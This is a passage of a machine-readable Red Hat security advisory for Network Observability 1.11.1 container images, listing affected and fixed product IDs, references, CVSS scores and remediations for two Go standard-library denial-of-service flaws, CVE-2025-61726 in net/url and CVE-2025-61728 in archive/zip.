"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
